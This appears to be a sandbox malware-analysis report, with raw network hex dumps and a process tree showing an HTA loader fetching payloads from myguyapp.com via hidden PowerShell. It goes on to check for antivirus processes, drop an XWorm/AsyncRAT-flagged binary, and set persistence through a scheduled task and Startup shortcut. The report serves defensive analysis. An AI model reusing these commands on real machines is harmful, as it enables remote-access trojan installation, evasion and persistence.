2024-12-10 08:48:06 UTC	16384	IN	Data Raw: 56 85 d9 33 a3 08 bd c4 85 18 67 11 1f e7 f7 bf ca 60 3f 48 ff d4 ea 3d 51 fb 77 9a 66 52 54 de 13 ab 57 f0 78 9b 1c 75 f6 d1 78 be 62 7e 75 1a e1 bb c7 d0 e6 33 3f 2e 32 0f 59 b0 84 5b cf 7b 96 d4 20 bb f7 12 f2 2d d0 77 11 bb 18 c3 62 9b d0 83 59 b0 1b b3 54 06 28 57 e3 27 84 2d 6d fe 71 3c 7f 7f 19 c5 1b 66 c1 d3 34 36 07 1f db 68 34 28 f4 63 30 b3 2b ab be 58 15 14 72 12 14 c7 52 6a ca 26 10 1e 5a 6e 1a 9f 03 25 12 b5 57 24 4e 06 bc 56 42 67 31 88 c3 1c ab 70 fb 02 6e 23 17 2d da c1 a0 7f f8 19 43 73 6b 31 29 61 f6 c4 78 71 ee a3 41 e0 a6 de 18 b1 84 14 52 ec 66 c1 53 f5 bc df 09 55 21 76 a8 54 ca 54 2b e1 d5 ee a2 6a ec df 30 51 de d7 d4 dc b4 24 11 09 6a cc 2c ea f0 16 ed 89 aa 20 fb 19 aa c5 cf 80 39 ca 26 d0 2a a6 fa 9d 88 8d 5d 0a ce 8e d8 8d 4e Data Ascii: V3g`?H=QwfRTWxuxb~u3?.2Y[{ -wbYT(W'-mq<f46h4(c0+XrRj&Zn%W$NVBg1pn#-Csk1)axqARfSU!vTT+j0Q$j, 9&*]N
2024-12-10 08:48:06 UTC	16384	IN	Data Raw: ce 1d 83 46 b1 f2 54 b9 9e 4e 71 9d 6a 2d c6 ef 7d 69 7c 91 bb 91 53 be 42 e2 a3 03 11 c3 d0 d7 54 67 d7 39 17 bf 9a 5d fc b1 33 24 71 6a fb 4b 5f c6 9d a8 e2 12 63 c5 15 f3 ae 6b e7 1f 75 09 73 5d ba f8 d1 66 78 27 b5 6f 51 22 07 81 9c b6 b7 53 ae 42 ab 7a 20 3f 20 f1 0d e7 5c d9 fc 1d b7 b3 6b dc f3 5f fb 37 39 03 57 ac 2a de 97 de 5a 52 d0 5d 63 6a b8 58 3f 56 7e 35 6d 1b 3e 81 2f d0 8f 48 d4 da 3e d5 be 5e af b5 7a 3a ed 75 f8 93 6d 8e 1a c4 5f 82 9f 2b dc a2 3c 43 f2 a4 30 47 b4 8d ef 8e 9a db dd d1 11 df 1e cd 9f d3 1d 2c b9 39 62 7e 2c 36 8b c6 20 79 fb 8e d6 e1 a6 09 a5 15 4b 3d 58 c2 8f 8a cf 46 77 2b 8a 1b c0 75 39 1d a3 e5 ee e9 bc 1a e2 7c 1e 5c cd c0 74 7c cf 83 1f 6e b5 41 2b df 1c 0c 8a 3b 38 be 04 47 92 17 7d f5 df 1e 74 b3 3a 75 43 b0 cb Data Ascii: FTNqj-}i\|SBTg9]3$qjK_ckus]fx'oQ"SBz ? \k_79W*ZR]cjX?V~5m>/H>^z:um_+<C0G,9b~,6 yK=XFw+u9\|\t\|nA+;8G}t:uC
2024-12-10 08:48:07 UTC	16384	IN	Data Raw: 93 60 7c 07 2b fd 2b 71 34 1d 1b b7 95 de 6d a8 d1 45 6c d2 7d 90 60 6e e4 d0 fb 59 98 e6 a7 b1 47 af bd f9 91 fe 7d 93 c8 34 a3 7c be bf a9 8b e0 f0 58 d4 f2 63 e3 a6 12 a8 49 60 db 1d 05 fc c4 df 2a bd 75 cf ac e2 8b fa 54 55 91 f5 75 4a 85 a3 44 b9 d4 d2 df 9e 3d d6 cd 4c 30 ac fb 65 88 e8 ad 62 79 9f a3 cd 1e 80 b5 f8 1f 45 c5 2b 26 1f 64 d8 20 21 74 57 6d 68 8f 70 29 c2 c6 ab b6 e7 02 62 d2 9c 41 27 59 c6 f9 52 39 04 51 f6 1c f1 aa c7 58 a5 18 64 48 94 0d 13 56 b6 cd dd 60 ca 70 40 85 2e 96 d0 d5 85 d1 d5 45 d1 d5 69 5c 18 3c 58 66 c8 26 32 38 33 21 96 0b 85 f1 a9 00 4b a9 44 51 92 2d b8 8a 4d 8a ee 7b b3 8e 22 16 09 ea 03 29 00 79 83 c1 1a e8 5a 23 7c 42 78 25 67 e3 63 15 6c 06 58 47 e9 95 97 25 f1 f3 35 5e 21 c7 09 0d d9 56 cf 71 54 84 a3 02 70 1f Data Ascii: `\|++q4mEl}`nYG}4\|XcI`*uTUuJD=L0ebyE+&d !tWmhp)bA'YR9QXdHV`p@.Ei\<Xf&283!KDQ-M{")yZ#\|Bx%gclXG%5^!VqTp
2024-12-10 08:48:07 UTC	16384	IN	Data Raw: f9 b4 5f c7 58 37 b2 67 8f bf fc 08 56 d9 81 6d 04 63 79 f0 2f 7b 2a e2 2c 53 ba 09 64 06 3e e1 91 2b 5a b9 98 92 50 bd 80 bc 92 de 2e 1d 0e 07 79 b2 c7 6e d3 46 d8 40 cc c7 5d c4 77 de 35 60 24 4e bc f5 c9 0a 16 61 c5 65 0a b5 e3 18 3e 51 b0 5a 90 14 d8 10 95 c8 8e f9 c5 63 43 c0 f3 c4 b6 8e aa 13 af 9f fd e8 35 9e 21 ef 3b d1 ed 88 4e 48 44 70 57 27 1b bd 2f 9b 5e df de 69 aa 7e 00 da f6 8a 45 91 be ee 3c e7 2c 1b f1 d4 ff 4b 16 df 42 5b 5b 11 fe 91 e5 3b 55 46 34 6f b0 f0 e5 54 e4 42 70 d6 b9 c3 a8 d0 fe 4e f9 e3 11 75 34 1f c6 99 aa 3a c2 a5 fe 6c bc c6 f8 35 8d 62 01 ec 3a 9e 96 cb 81 6c 73 cb aa 34 29 f3 15 3d 34 a5 ea 29 97 56 6a 41 c2 c4 6e 9a 10 26 a2 e6 1c d6 f3 28 b0 dd ae b1 17 67 1d be 89 c2 e6 81 54 bc 6f bf 81 7a b6 bc f5 5f 9d b5 15 da a6 Data Ascii: _X7gVmcy/{*,Sd>+ZP.ynF@]w5`$Nae>QZcC5!;NHDpW'/^i~E<,KB[[;UF4oTBpNu4:l5b:ls4)=4)VjAn&(gToz_
2024-12-10 08:48:07 UTC	16384	IN	Data Raw: 53 2f 24 2c 11 25 a5 75 42 9f ba 65 2a d8 59 b6 9f cc 8b 06 bd f4 bf c0 72 ed 69 97 5c 2f 66 35 40 2e fe d0 44 fa f3 fa 15 f1 98 0f d6 3f 75 25 87 af 9f 71 cb f4 65 55 36 b3 0f e4 bf 16 3e eb bd a2 a1 03 88 6c 47 de 8d 16 85 a2 03 f7 ea 0f d2 5d 3f 05 6b 75 52 03 76 4e 82 9f 7e 8f 25 f8 1b f6 a6 15 d7 0f ae 56 fb 1c 4b fe ca 9d d1 30 87 8c 5a e8 01 71 87 3b 38 62 22 82 11 dd cd c6 85 a7 b5 d0 9c 81 9c a4 08 49 9e 31 d7 37 84 71 67 85 4f 60 56 e9 cc a0 3d 3d 35 a8 31 c8 46 87 2c 07 4a 29 9b 06 f5 76 de 9a 00 75 bf 82 68 9e 96 1c 0b b5 61 e2 42 2b 44 8f 6b af 55 7d 7b 09 70 cb 22 60 53 f1 50 ca 93 e8 e1 d5 af 35 50 d9 28 8b 73 1f 21 20 ac 06 42 0c c4 07 34 43 32 c4 d0 8e 5c 88 8d 58 fb e2 99 f7 e5 23 5c dc f7 13 4c b1 d2 cd e0 c7 f6 d3 e9 e6 6b be 26 87 ec Data Ascii: S/$,%uBe*Yri\/f5@.D?u%qeU6>lG]?kuRvN~%VK0Zq;8b"I17qgO`V==51F,J)vuhaB+DkU}{p"`SP5P(s! B4C2\X#\Lk&
2024-12-10 08:48:07 UTC	16384	IN	Data Raw: b6 88 82 7a 44 8a 25 9b 38 0b 1b f5 8b 83 6d c3 42 b2 f4 78 a4 ee ab 2a 25 99 99 79 af ec e9 c5 ef 7b fc d7 0c 94 83 97 24 f9 7e 7f d8 f2 a8 0a f4 9c 72 0c 7b 79 7f f1 51 5f d1 83 82 b4 21 fa e3 93 7c 8f 83 26 14 95 cf 3d 37 4d 61 71 af fe c7 50 41 e9 f1 17 08 7f b3 42 c1 d3 d5 c3 69 77 27 64 7b bd ba 3b 45 8a 05 d2 e0 c0 0d b2 a6 7b 97 59 3f da ae 1a 6c 81 46 e0 da 93 fe d4 36 57 0d b2 14 1a d3 65 01 f5 28 5b d6 ed a9 65 73 a6 bd f2 bf c3 ef ba 4b 95 a3 8d df 42 92 a0 40 3d 81 1e 42 bc 0c 5c af f1 42 0b 98 1a 04 4d 4a 92 38 f1 c0 3b 4d e0 5e 14 08 fc 68 bf b1 1e 80 cb 6a ef 3f e6 20 5a 09 01 86 c5 10 28 38 0a 29 08 dd 5a be 5b f5 19 86 b2 a7 b7 06 5c 10 f7 8d a1 07 f9 17 5f 08 af 48 4c 3f 41 89 41 08 6c 98 a7 a8 00 0d cd ac 7f 10 82 d3 b8 ce 5c 06 79 b2 Data Ascii: zD%8mBx*%y{$~r{yQ_!\|&=7MaqPABiw'd{;E{Y?lF6We([esKB@=B\BMJ8;M^hj? Z(8)Z[\_HL?AAl\y
2024-12-10 08:48:07 UTC	16384	IN	Data Raw: 0d c6 fc 81 53 e3 a2 bb ae ce bd 5a 7f 5b 5c 40 7f a4 29 1f 32 7c 35 25 f2 e4 f9 73 14 63 6b a7 6f 26 45 9f ac 2d 4e 76 27 44 7f 9a cf 2a 7a 76 df e8 f2 8b 34 86 cf c7 34 60 55 3f 8f f3 7d 7d 57 67 ea 5b 28 4b 6e ae fb e2 e7 29 e7 c7 75 ae e9 97 7b be 54 d2 d5 31 8b 00 89 f5 5b 3a 35 32 b1 69 0d 8c 07 bc a3 68 62 88 f7 ee f5 88 0f e6 fa 11 df 44 e2 51 cd 63 ee 28 02 5d e0 27 be 1a 34 04 f0 2c fb 7c 9e f8 46 bb bc e1 db db 7d d1 0c ff 21 60 68 46 a4 2c b6 b8 6d fa d7 48 45 67 c0 d4 8c d9 ac 43 d9 80 0f 97 b7 da b4 db 10 92 43 1a ef 47 f1 71 f4 89 9a 59 78 d5 f0 b6 f4 60 e2 58 78 81 d4 23 61 71 fe c6 10 f7 fc f4 87 ed 67 b5 03 93 4f 2f 8c e6 1f 8e bd a0 cf 2c c0 4d 54 1f 61 2c 28 89 ba 24 6a a8 91 f4 d9 3a 4b f6 aa f5 31 8a dd 86 92 a2 97 f4 b5 0a eb c4 b6 Data Ascii: SZ[\@)2\|5%scko&E-Nv'D*zv44`U?}}Wg[(Kn)u{T1[:52ihbDQc(]'4,\|F}!`hF,mHEgCCGqYx`Xx#aqgO/,MTa,($j:K1
2024-12-10 08:48:07 UTC	16384	IN	Data Raw: 37 49 78 13 37 5e b4 97 60 2a e6 0d b2 bc 19 67 ec 3b 9a 45 a7 cc 50 dd ac 3d cd 84 e9 05 95 5d 2e 3c 66 6f 26 74 9f 5f e6 43 1a f7 23 70 b6 bd 31 c0 63 c9 0d 3f 5f c9 49 6f e7 fb 36 b9 30 bf 52 fd 63 65 c3 c9 4c 07 da a0 07 70 6c 9c 10 96 81 c9 86 58 bb 8e 6a 0d 54 f3 1e 6c 48 61 77 97 72 cf a1 57 cb df 5e 5a 05 5d 04 66 6c a1 3c 3b 68 a8 99 88 0a 4a c9 65 38 95 2b d7 82 1c ee 96 eb f6 c2 b8 53 4b 76 71 23 1c 2e 7f a6 10 31 ac b9 00 1d b7 33 a4 fc dd d5 4e 7e e9 e1 cd 46 52 d4 25 c4 8c 7f 06 93 ca ee 14 8c 8c 9b 69 d8 27 91 4f e0 46 c5 05 04 aa ab 17 37 00 dd c6 a4 66 6e d1 56 36 90 14 75 76 b5 0b b3 a2 a4 29 30 94 08 43 60 53 c4 c4 db 52 2f 14 c9 60 11 ae 5a ce 2c ec 33 cc fd e7 10 de 0a 19 46 bd 02 b1 9c f9 f2 45 97 8a 9d 48 57 48 21 64 44 53 0c c2 c2 Data Ascii: 7Ix7^`*g;EP=].<fo&t_C#p1c?_Io60RceLplXjTlHawrW^Z]fl<;hJe8+SKvq#.13N~FR%i'OF7fnV6uv)0C`SR/`Z,3FEHWH!dDS
2024-12-10 08:48:07 UTC	16384	IN	Data Raw: 8e c6 84 cc 36 53 d4 04 f9 57 bb cf dc ae 21 91 54 31 d2 b4 f8 b0 99 26 e7 00 e5 1d ee 47 32 48 4f 22 f1 fd 0e 26 ca 1c 35 53 bc 5a ba 4b 23 61 90 cd ec 16 74 77 9b 62 30 30 da f1 2a 0a d8 92 a2 27 f4 bd cc ee ed 9b 74 f5 54 82 a2 d1 79 26 a2 0b 05 91 0d a8 fb 22 01 6a 8a 78 92 72 82 e0 dc a8 f3 fc d5 0a 40 d6 a9 7e fe 0c c3 d8 ac 8a 35 d6 cf 36 f8 56 e8 8c 34 8c 0b e3 a5 e7 26 fe fc af 1b 5c d7 95 5e 4f 41 7c 6c b1 fe db 60 47 fb 4e 8f fe fb 7d 6c 90 c5 c5 32 f5 f5 78 7e da d0 7e 80 d4 ad 27 b1 d4 53 a7 29 34 ad 46 42 cc af 15 28 9d c2 d0 7e 2e be d9 fb 32 de 6f 28 92 22 70 41 26 b5 a8 36 5f f7 a8 e6 cb 84 ac 31 2b 55 13 8e fc 05 ad 53 a2 18 08 be a3 3a 34 87 94 12 12 1a fb ea ed 74 ad a6 19 2d fa ae 0c 33 50 1c 04 51 1e 18 11 b2 94 05 49 1e 9b 81 6d 95 Data Ascii: 6SW!T1&G2HO"&5SZK#atwb00*'tTy&"jxr@~56V4&\^OA\|l`GN}l2x~~'S)4FB(~.2o("pA&6_1+US:4t-3PQIm

Target ID:	0
Start time:	03:47:56
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\c2.hta"
Imagebase:	0xd30000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:47:59
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:47:59
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:47:59
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
Imagebase:	0x8c0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:48:03
Start date:	10/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"
Imagebase:	0x7ff686a00000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	03:48:03
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Imagebase:	0x8c0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:48:04
Start date:	10/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff6413e0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	03:48:04
Start date:	10/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1512,i,15955159168811455781,12168193802298168487,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff6413e0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	03:48:17
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Imagebase:	0x8c0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:48:45
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
Wow64 process (32bit):	true
Commandline:	msword.exe
Imagebase:	0x400000
File size:	891'289'591 bytes
MD5 hash:	C744E054E4EF01832BBF43B81D397B61
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 8%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:48:46
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:48:47
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:48:48
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xdd0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:48:48
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0x650000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:48:48
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xdd0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:48:48
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0x650000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	03:48:49
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 220239
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	03:48:49
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "DimPieLilHot" Statistical
Imagebase:	0x650000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:48:49
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	03:48:50
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\220239\Carter.pif
Wow64 process (32bit):	true
Commandline:	Carter.pif F
Imagebase:	0xa80000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000018.00000003.3881968473.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000003.3881968473.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000018.00000003.3881936961.00000000042C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000003.3881936961.00000000042C2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000018.00000002.4500843743.000000000426B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.4500843743.000000000426B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000018.00000003.3881856038.0000000004279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000003.3881856038.0000000004279000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000018.00000003.3826189129.0000000001B47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000003.3826189129.0000000001B47000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000018.00000003.3881856038.0000000004289000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000003.3881856038.0000000004289000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 8%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	03:48:50
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x780000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	03:48:51
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:48:51
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	03:48:51
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Imagebase:	0x120000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	03:48:51
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	03:48:51
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	03:48:53
Start date:	10/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
Imagebase:	0x7ff6075f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	03:48:54
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
Imagebase:	0x220000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 8%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
